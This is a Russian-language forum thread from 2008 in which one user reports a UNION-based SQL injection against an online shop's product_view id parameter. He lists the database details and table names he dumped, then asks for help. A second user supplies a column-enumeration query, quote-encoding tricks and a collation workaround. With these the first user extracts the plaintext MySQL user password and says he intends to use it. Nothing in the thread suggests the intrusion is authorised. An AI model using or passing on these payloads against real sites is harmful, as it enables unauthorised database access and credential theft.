Сообщений в теме: 4

[KoIIIaK]

В общем вот что нарыл по сайту:
/?action=product_view&id=-12+union+select+1,...,10,concat_ws(0x3C62723E,DATABASE(),VERSION(),USER()),..,48+--
имя базы     версия          имя пользователя базы
main             5.0.45               advip@localhost
-12+union+select+1,..,10,user,12,password,..,48+from+musql.user/*
Table 'musql.user' doesn't exist
Далее искал названия таблиц следующим запросом:
/?action=product_view&id=-12+union+select+1,..,TABLE_NAME,12,..,48+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1+--
в поле выводилось не больше одной строки, получил след данные:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS

bevip_admin
bevip_article
bevip_article_category
bevip_catalog
bevip_city
bevip_currency
bevip_customer
bevip_delivery
bevip_dictionary
bevip_discount
bevip_faq
bevip_guestbook
bevip_help
bevip_indexpromo
bevip_info
bevip_mail_list
bevip_metro
bevip_news
bevip_order_complete
bevip_order_content
bevip_order_status
bevip_payment
bevip_product
bevip_promotion
bevip_search
bevip_subscribe
bevip_systemvar
bevip_vendor
*********************
dressshop_admin
dressshop_article и тд.....
********************
pbs_admin
pbs_article и тд.....
*******************
sum_admin
sum_article и тд...
********************
columns_priv
db
func
help_category
help_keyword
help_relation
А теперь загвоздка, не могу сформировать запрос с WHERE и тд, короче подскажите как продвигаться дальше, не ругайтесь за возможную тупость вопроса, первый раз делаю.....
Если не трудно напишите пример запроса на колонку из нужной таблицы, и как замаскировать в запросе кавычки?

[aka PSIH]

Ну начнем с того что правильно mysql.user

Цитата

не могу сформировать запрос с WHERE

какая ошибка вылазит?

Цитата

напишите пример запроса на колонку из нужной таблицы

select column_name from information_schema.columns where table_name='TABLE NAME'/*

'TABLE NAME' -  попробуй в HEX или CHAR() закодировать...

Цитата

как замаскировать в запросе кавычки

попробуй
%27, 0x27, " ; иногда что тока не проканывает ;)

[KoIIIaK]

Спасибо, блин с опечаткой в названии ступил конечно))
в хекс и чар загонял, ругается, сейчас проверю предложенные варианты и отпишусь, ошибки тож укажу.
Спасибо за своевременную помощь)

Добавлено:

?action=product_view&id=-12+union+select+1,2,3,user,...48+from+mysql.user+--
выдал норм: advip
а при следующем
?action=product_view&id=-12+union+select+1,2,3,password,...48+from+mysql.user+--
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
ему не нравиться кодировка?

Цитата

select column_name from information_schema.columns where table_name='TABLE NAME'/*

да просто не могу разобраться что из вышеперечисленных полученных названия является таблицами а что колонками, попробую перебором...

[aka PSIH]

Цитата

Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'

?action=product_view&id=-12+union+select+1,2,3,aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x71),0x71),...48+from+mysq
l.user--

[KoIIIaK]

aka PSIH (8.5.2008, 17:22) писал:

Цитата

Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'

?action=product_view&id=-12+union+select+1,2,3,aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x71),0x71),...48+from+mysq
l.user--

))))))))))))))))
пасиб даже не хэш а сам пароль)) Осталось найти куда его ввести) спс всем

НУ ДУМАЮ ТЕМА ЗАКРЫТО ОГРОМНОЕ СПАСИБО aka PSIH